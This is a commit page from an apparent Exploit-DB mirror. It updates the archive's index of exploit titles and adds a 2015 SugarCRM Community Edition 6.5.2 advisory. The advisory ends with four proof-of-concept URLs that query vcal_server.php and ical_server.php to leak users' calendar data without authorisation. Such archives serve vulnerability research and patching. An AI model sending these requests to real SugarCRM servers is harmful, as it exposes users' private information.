bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-26

Browse source 
1 new exploits
This commit is contained in:
Offensive Security 2015-07-26 05:02:17 +00:00
parent c22dc8c9d4
commit 756da2b8cc
2 changed files with 18 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -33995,12 +33995,12 @@ id,file,description,date,author,platform,type,port
37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution Vulnerability",2015-07-20,"Eduardo Braun Prado",windows,local,0
37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection Vulnerability",2011-10-06,"Mr. Tokumaru",php,remote,0
37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0
37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Reza Espargham",ios,dos,0
37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Mohammad Reza Espargham",ios,dos,0
37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS_ Android & Win 3.1.3 - Persistent Vulnerability",2015-07-20,Vulnerability-Lab,multiple,webapps,0
37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0
37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Reza Espargham",windows,remote,0
37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
@ -34022,3 +34022,4 @@ id,file,description,date,author,platform,type,port
37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0

Can't render this file because it is too large.

15
platforms/php/webapps/37691.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/55347/info
SugarCRM Community Edition is prone to multiple information-disclosure vulnerabilities because it fails to restrict access to certain application data.
Attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
SugarCRM Community Edition 6.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/sugarcrm/vcal_server.php?type=vfb&email=will@example.com
http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will
http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&email=will@example.com
http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will